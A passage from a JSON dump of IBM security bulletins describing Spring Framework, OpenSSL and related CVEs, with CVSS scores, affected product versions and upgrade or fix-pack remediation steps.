https://exchange.xforce.ibmcloud.com/vulnerabilities/222201](<https://exchange.xforce.ibmcloud.com/vulnerabilities/222201>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2022-0778](<https://vulners.com/cve/CVE-2022-0778>) \n** DESCRIPTION: **OpenSSL is vulnerable to a denial of service, caused by a flaw in the BN_mod_sqrt() function when parsing certificates. By using a specially-crafted certificate with invalid explicit curve parameters, a remote attacker could exploit this vulnerability to cause an infinite loop, and results in a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/221911](<https://exchange.xforce.ibmcloud.com/vulnerabilities/221911>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**\n\n| \n\n**Version(s)** \n \n---|--- \n \nIBM MaaS360 VPN Module\n\n| \n\n2.106.100 and prior \n \nIBM MaaS360 Mobile Enterprise Gateway\n\n| \n\n2.106.200 and prior \n \nIBM MaaS360 Cloud Extender Agent\n\n| \n\n2.106.100.008 and prior \n \n \n\n\n## Remediation/Fixes\n\nIBM encourages customers to update their systems promptly. \n\n1\\. Update the IBM MaaS360 Mobile Enterprise Gateway and the MaaS360 VPN Module to version 2.106.500 or higher. Instructions on how to upgrade the Mobile Enterprise Gateway and VPN Module is located on this IBM Documentation [page](<https://www.ibm.com/docs/en/maas360?topic=ice-upgrading-mobile-enterprise-gateway-meg-maas360-vpn-modules> \"page\" ).\n\n2\\. Update the IBM MaaS360 Cloud Extender to version 2.106.500.011 or greater. The latest Cloud Extender agent is available within the MaaS360 Administrator Portal. Instructions to upgrade the Agent is located on this IBM Documentation [page](<https://www.ibm.com/docs/en/maas360?topic=extender-upgrading-cloud> \"page\" ).\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-06T18:27:01", "type": "ibm", "title": "Security Bulletin: IBM MaaS360 Cloud Extender Agent, Mobile Enterprise Gateway and VPN module have multiple vulnerabilities (CVE-2021-22060, CVE-2022-22950, CVE-2022-0547, CVE-2022-0778, CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22060", "CVE-2022-0547", "CVE-2022-0778", "CVE-2022-22950", "CVE-2022-22965"], "modified": "2022-06-06T18:27:01", "id": "14108283F9157C4F2A38313CFBD3F47CFDC207CBE84809E04B7E197DA546B8D3", "href": "https://www.ibm.com/support/pages/node/6592807", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:05:52", "description": "## Summary\n\nIBM Watson Discovery for IBM Cloud Pak for Data is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used for internal services. The fix includes Spring 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22963](<https://vulners.com/cve/CVE-2022-22963>) \n** DESCRIPTION: **VMware Spring Cloud Function could allow a remote attacker to execute arbitrary code on the system, caused by an error when using the routing functionality. By providing a specially crafted SpEL as a routing-expression, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223020](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223020>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nWatson Discovery| 4.0.0-4.0.7 \nWatson Discovery| 2.0.0-2.2.1 \n \n\n\n## Remediation/Fixes\n\nUpgrade to IBM Watson Discovery 4.0.8 \n\nUpgrade to IBM Watson Discovery 2.2.1 and apply cpd-watson-discovery-2.2.1-patch-10\n\n<https://cloud.ibm.com/docs/discovery-data?topic=discovery-data-install>\n\n<https://www.ibm.com/support/pages/available-patches-watson-discovery-ibm-cloud-pak-data>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T14:54:28", "type": "ibm", "title": "Security Bulletin: IBM Watson Discovery for IBM Cloud Pak for Data is affected by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-27T14:54:28", "id": "370CF55655D0DCE5B827E549AA74D877B1D4BA2D531AAEFFDF0A6CA27218326F", "href": "https://www.ibm.com/support/pages/node/6570949", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:03:54", "description": "## Summary\n\nThere are multiple vulnerabilities in Spring Framework (CVE-2022-22968, CVE-2022-22965, and CVE-2022-22950) as described in the vulnerability details section. Spring Framework v5.3.8 is used by Db2 Web Query for i for infrastructure support. IBM has addressed the vulnerabilities in Db2 Web Query for i by upgrading to Spring Framework v5.3.19. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22968](<https://vulners.com/cve/CVE-2022-22968>) \n** DESCRIPTION: **Spring Framework could provide weaker than expected security, caused by a data binding rules vulnerability in which the patterns for disallowedFields on a DataBinder are case sensitive. The case sensitivity allows that a field is insufficiently protected unless it is listed with both upper and lower case for the first character of the field. An attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/224374](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224374>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Db2 Web Query for i| 2.3.0 \nIBM Db2 Web Query for i| 2.2.1 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now.**\n\nDb2 Web Query for i releases 2.2.1 and 2.3.0 are impacted. \n\n**Release 2.2.1 can be fixed by upgrading to release 2.3.0.**\n\nTo request an EZ-Install package, including instructions for the upgrade installation, send an email to [QU2@us.ibm.com](<mailto:QU2@us.ibm.com>). More information for the upgrade is available at <https://ibm.biz/db2wq-install>. \n\n**Release 2.3.0 can be fixed by applying the latest Db2 Web Query for i group Program Temporary Fix (PTF).**\n\nThe PTFs are applied to product ID 5733WQX. The group PTF numbers and minimum level with the fix are:\n\n**Affected Releases**\n\n| \n\n**Group PTF and Minimum Level for Remediation** \n \n---|--- \n \nDb2 Web Query for i 2.3.0 w/ IBM i 7.5\n\n| \n\n[SF99671 level 6](<https://www.ibm.com/support/fixcentral/ibmi/quickorder?function=IBMiFixId&fixids=SF99671&includeSupersedes=0&source=fc> \"SF99671 level 6\" ) \n \nDb2 Web Query for i 2.3.0 w/ IBM i 7.4\n\n| \n\n[SF99654 level 6](<https://www.ibm.com/support/fixcentral/ibmi/quickorder?function=IBMiFixId&fixids=SF99654&includeSupersedes=0&source=fc>) \n \nDb2 Web Query for i 2.3.0 w/ IBM i 7.3\n\n| \n\n[SF99533 level 6](<https://www.ibm.com/support/fixcentral/ibmi/quickorder?function=IBMiFixId&fixids=SF99533&includeSupersedes=0&source=fc>) \n \n_**Important note:** \n__IBM recommends that all users running unsupported versions of affected products upgrade to supported and fixed version of affected products._\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T05:17:19", "type": "ibm", "title": "Security Bulletin: Due to use of Spring Framework, IBM Db2 Web Query for i is vulnerable to unprotected fields (CVE-2022-22968), remote code execution (CVE-2022-22965), and denial of service (CVE-2022-22950).", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22965", "CVE-2022-22968"], "modified": "2022-06-10T05:17:19", "id": "2FB703AAD3FC5C2BE7EED7EC7E69FEBE209E6C70177FEA76C552605DF83D85ED", "href": "https://www.ibm.com/support/pages/node/6593861", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:03:09", "description": "## Summary\n\nIBM QRadar SIEM is affected but not vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. QVM utilizes the Spring Framework to support our Java backed user interface.. The fix includes Spring 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22963](<https://vulners.com/cve/CVE-2022-22963>) \n** DESCRIPTION: **VMware Spring Cloud Function could allow a remote attacker to execute arbitrary code on the system, caused by an error when using the routing functionality. By providing a specially crafted SpEL as a routing-expression, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223020](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223020>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nQRadar / QRM / QVM / QRIF / QNI v7.3| 7.3.0 - 7.3.3 Fix Pack 11 \nQRadar / QRM / QVM / QRIF / QNI v7.4| 7.4.0 - 7.4.3 Fix Pack 5 \nQRadar / QRM / QVM / QRIF / QNI v7.5| 7.5.0 - 7.5.0 Update Package 1 \n \n \n\n\n## Remediation/Fixes\n\nIBM encourages customers to update their systems promptly. \n\n**Product**| **Versions**| **Fix** \n---|---|--- \nQRadar / QRM / QVM / QRIF / QNI| 7.3| [7.3.3 Fix Pack 11 Interim Fix 01](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=All&platform=Linux&function=fixId&fixids=7.3.3-QRADAR-QRSIEM-20220517151911INT&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"7.3.3 Fix Pack 11 Interim Fix 01\" ) \nQRadar / QRM / QVM / QRIF / QNI| 7.4| [7.4.3 Fix Pack 6](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=All&platform=Linux&function=fixId&fixids=7.4.3-QRADAR-QRSIEM-20220531120920&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"7.4.3 Fix Pack 6\" ) \nQRadar / QRM / QVM / QRIF / QNI| 7.5| [7.5.0 Update Package 2](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=All&platform=Linux&function=fixId&fixids=7.5.0-QRADAR-QRSIEM-20220527130137&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"7.5.0 Update Package 2\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-24T17:34:09", "type": "ibm", "title": "Security Bulletin: IBM QRadar SIEM is affected by a remote code execution in Spring Framework (CVE-2022-22963, CVE-2022-22965, CVE-2022-22950)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-06-24T17:34:09", "id": "C0904FD149C70D8A2835DB923B2BF04803388EF83CB969D07F28836C567C672B", "href": "https://www.ibm.com/support/pages/node/6598419", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:04:24", "description": "## Summary\n\nIBM Common Licensing is vulnerable to a remote code execution in Spring Framework (CVE-2021-22096,CVE-2021-22060,CVE-2022-22950,CVE-2022-22968) as it does have Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. The fix includes Spring Framework version 5.3.19.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-22096](<https://vulners.com/cve/CVE-2021-22096>) \n** DESCRIPTION: **VMware Spring Framework could allow a remote attacker to bypass security restrictions. By sending a specially-crafted input, an attacker could exploit this vulnerability to cause the insertion of additional log entries. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/212430](<https://exchange.xforce.ibmcloud.com/vulnerabilities/212430>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22968](<https://vulners.com/cve/CVE-2022-22968>) \n** DESCRIPTION: **Spring Framework could provide weaker than expected security, caused by a data binding rules vulnerability in which the patterns for disallowedFields on a DataBinder are case sensitive. The case sensitivity allows that a field is insufficiently protected unless it is listed with both upper and lower case for the first character of the field. An attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/224374](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224374>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-22060](<https://vulners.com/cve/CVE-2021-22060>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote authenticated attacker to bypass security restrictions, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to insert additional log entries. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Common Licensing| ART 8.1.6 \nIBM Common Licensing| ART 9.0 \nIBM Common Licensing| Agent 9.0 \n \n\n\n## Remediation/Fixes\n\nTheCVE-2021-22096,CVE-2021-22060,CVE-2022-22950,CVE-2022-22968 flaw lies in Spring Framework. Spring has provided update fixes (Spring Framework 5.2.20 &amp; 5.3.18+). The advisory cautions that the vulnerability is \"general, and there may be other ways to exploit it.\" \nIBM strongly recommends addressing the Spring framework vulnerability now by applying the suggested fix that uses Spring Framework 5.3.19. \n\n \nApply the ART and Agent ifix from fix central :\n\n[IBM_LKS_Administration_And_Reporting_Tool_And_Agent_90_Spring_ART_LDAP_iFix_1](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FRational%2FRational+Common+Licensing&fixids=IBM_LKS_Administration_And_Reporting_Tool_And_Agent_90_Spring_ART_LDAP_iFix_1&source=SAR&function=fixId&parent=ibm/Rational> \"IBM_LKS_Administration_And_Reporting_Tool_And_Agent_90_Spring_ART_LDAP_iFix_1\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-06-01T07:16:30", "type": "ibm", "title": "Security Bulletin: IBM Common Licensing is vulnerable by a remote code attack in Spring Framework (CVE-2021-22096,CVE-2021-22060,CVE-2022-22950,CVE-2022-22968)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22060", "CVE-2021-22096", "CVE-2022-22950", "CVE-2022-22968"], "modified": "2022-06-01T07:16:30", "id": "B65E10799869808B38D96576AA4BC705E6DCC5744AAC77554C2319CB82A9DE27", "href": "https://www.ibm.com/support/pages/node/6591145", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-24T06:05:16", "description": "## Summary\n\nVulnerabilities in Spring Framework affects IBM Tivoli Application Dependency Discovery Manager (CVE-2022-22950, CVE-2021-22096, CVE-2022-22968, CVE-2021-22060).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2021-22096](<https://vulners.com/cve/CVE-2021-22096>) \n** DESCRIPTION: **VMware Spring Framework could allow a remote attacker to bypass security restrictions. By sending a specially-crafted input, an attacker could exploit this vulnerability to cause the insertion of additional log entries. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/212430](<https://exchange.xforce.ibmcloud.com/vulnerabilities/212430>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22968](<https://vulners.com/cve/CVE-2022-22968>) \n** DESCRIPTION: **Spring Framework could provide weaker than expected security, caused by a data binding rules vulnerability in which the patterns for disallowedFields on a DataBinder are case sensitive. The case sensitivity allows that a field is insufficiently protected unless it is listed with both upper and lower case for the first character of the field. An attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/224374](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224374>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-22060](<https://vulners.com/cve/CVE-2021-22060>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote authenticated attacker to bypass security restrictions, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to insert additional log entries. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Application Dependency Discovery Manager| 7.3.0.0 - 7.3.0.9 \n \n\n\n## Remediation/Fixes\n\nIn order to fix these vulnerabilities, Spring is to be upgraded to 5.3.19 version. The efix to resolve these vulnerabilities can only be applied on **TADDM version 7.3.0.9** as per below given detailed steps. For customer at older TADDM Fixpack level (i.e., 7.3.0.8 or older), they need to first upgrade their TADDM environment to TADDM 7.3.0.9 level and then follow the step given below. \n\n**Detailed steps:**\n\n**For TADDM 7.3.0.9**, check if there is any previously applied eFixes in their TADDM environment.\n\n 1. If there is no prior efixes(ls -rlt etc/efix*) applied in their TADDM, then download the efix given in **Table-1 **and apply the 